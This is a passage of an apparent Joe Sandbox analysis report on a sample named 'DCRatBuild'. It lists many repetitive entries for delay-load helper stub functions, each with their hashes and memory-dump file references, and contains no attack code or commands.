                      • Opcode Fuzzy Hash: efc44e7fe19eb225e8dc3098ad2cc25ea8804a2ed9152360ade98030c7b33121
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 41496a5453383a85c079acf60d99b5650fc88fbff7a246d9d040fe69e86f65d1
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 41496a5453383a85c079acf60d99b5650fc88fbff7a246d9d040fe69e86f65d1
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 8bde87d5862c93909256ea3be3d3684820a7f88fd71cac1429c4846260b4d0a0
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 8bde87d5862c93909256ea3be3d3684820a7f88fd71cac1429c4846260b4d0a0
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 21a997e2217d1b91470d6fda6d7359d389f40d758be202071dda3a067593b01d
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 21a997e2217d1b91470d6fda6d7359d389f40d758be202071dda3a067593b01d
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: e6b4e6fbce2c457fa07669edb88b4d1f5fdf1219fcb3cae66e16145d58eb49b0
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: e6b4e6fbce2c457fa07669edb88b4d1f5fdf1219fcb3cae66e16145d58eb49b0
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 788e1ba66639ce0c30fde5584c882119102856639f9bb106482a07359c87b3e3
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 788e1ba66639ce0c30fde5584c882119102856639f9bb106482a07359c87b3e3
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 1aa98988455b874d01db13866ab361e8a59451cd523f6e9cb6c3077a5d151690
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 1aa98988455b874d01db13866ab361e8a59451cd523f6e9cb6c3077a5d151690
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 79d0162f60d01523533d7270e2810ff23956f8f38de4cfb45952fd5111559b4b
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 79d0162f60d01523533d7270e2810ff23956f8f38de4cfb45952fd5111559b4b
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 9885076e69593478a829639715e4f92276f556196b43cfe6923f2386d8990278
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: 9885076e69593478a829639715e4f92276f556196b43cfe6923f2386d8990278
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: ef2cbe02d1b2f696037cddc1ba1447e4b2d15f59a8c8827e60edf66deb99c147
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: ef2cbe02d1b2f696037cddc1ba1447e4b2d15f59a8c8827e60edf66deb99c147
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      Function 00D7DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 1078d6d5011643acaf854546851db0626e0bac1552b08bcb558fd1064b1084ca
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: 1078d6d5011643acaf854546851db0626e0bac1552b08bcb558fd1064b1084ca
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      Function 00D7DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: f56d0e0bdfb28a8b8a76763641d67d84c85bfb11b2575450d04cb32f5cf08be6
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: f56d0e0bdfb28a8b8a76763641d67d84c85bfb11b2575450d04cb32f5cf08be6
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      Function 00D7DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: faf720d5f6dec265e0b7b04c862e9e990cd10ed3e307133750fcdc2f363440f9
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: faf720d5f6dec265e0b7b04c862e9e990cd10ed3e307133750fcdc2f363440f9
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      Function 00D7DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 6eb03a8f1a15fc6dacb98d26da816a242bfa4af5d237fef015f0f52d4baeacec
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: 6eb03a8f1a15fc6dacb98d26da816a242bfa4af5d237fef015f0f52d4baeacec
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      Function 00D7DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: c35fd1e22c275ec1c70660fcde8ab73f9c6f39ed66feb0e4a3e44d55fa9121db
                      • Instruction ID: c86d836922df9aefbc7272a78cf5fb7050dc04edf516b90c24bd539397434eb7
                      • Opcode Fuzzy Hash: c35fd1e22c275ec1c70660fcde8ab73f9c6f39ed66feb0e4a3e44d55fa9121db
                      • Instruction Fuzzy Hash: 3FA001A62AD5427C3648B252BE17D3A626EEDE0B22331C61FF44FA4089B99898495871
                      Function 00D7DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 6e9445d7c14bd4694a576f09e597403ae79e3a8c2c7e312bb5b6a816962cc16d
                      • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                      • Opcode Fuzzy Hash: 6e9445d7c14bd4694a576f09e597403ae79e3a8c2c7e312bb5b6a816962cc16d
                      • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                      Function 00D7DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
